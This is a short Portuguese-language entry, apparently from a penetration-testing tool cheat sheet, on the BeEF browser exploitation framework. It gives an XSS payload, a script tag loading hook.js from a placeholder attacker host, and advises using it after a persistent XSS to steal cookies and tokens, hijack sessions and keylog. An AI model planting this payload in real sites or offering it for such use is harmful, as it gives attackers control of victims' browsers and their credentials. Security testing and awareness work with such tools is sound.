BeEF hook
beef-xss (framework); payload: <script src="http://<beef-host>:3000/hook.js"></script>
Framework de exploração de navegadores que permite controlar a vítima após um XSS persistente.
Quando você encontrou um XSS e quer explorá-lo para obter informações do navegador, cookies, tokens, ou até mesmo controlar a sessão do usuário. BeEF fornece uma interface para enviar comandos (engenharia social, redirecionamento, keylogging, etc.) à vítima. É útil em ataques de phishing ou em testes de conscientização.
Se o alvo não usa JavaScript ou tem CSP restritivo que bloqueia scripts externos. Também se o XSS é refletido e não persistente, a janela de oportunidade é curta. Prefira ferramentas mais simples se você só precisa roubar cookies.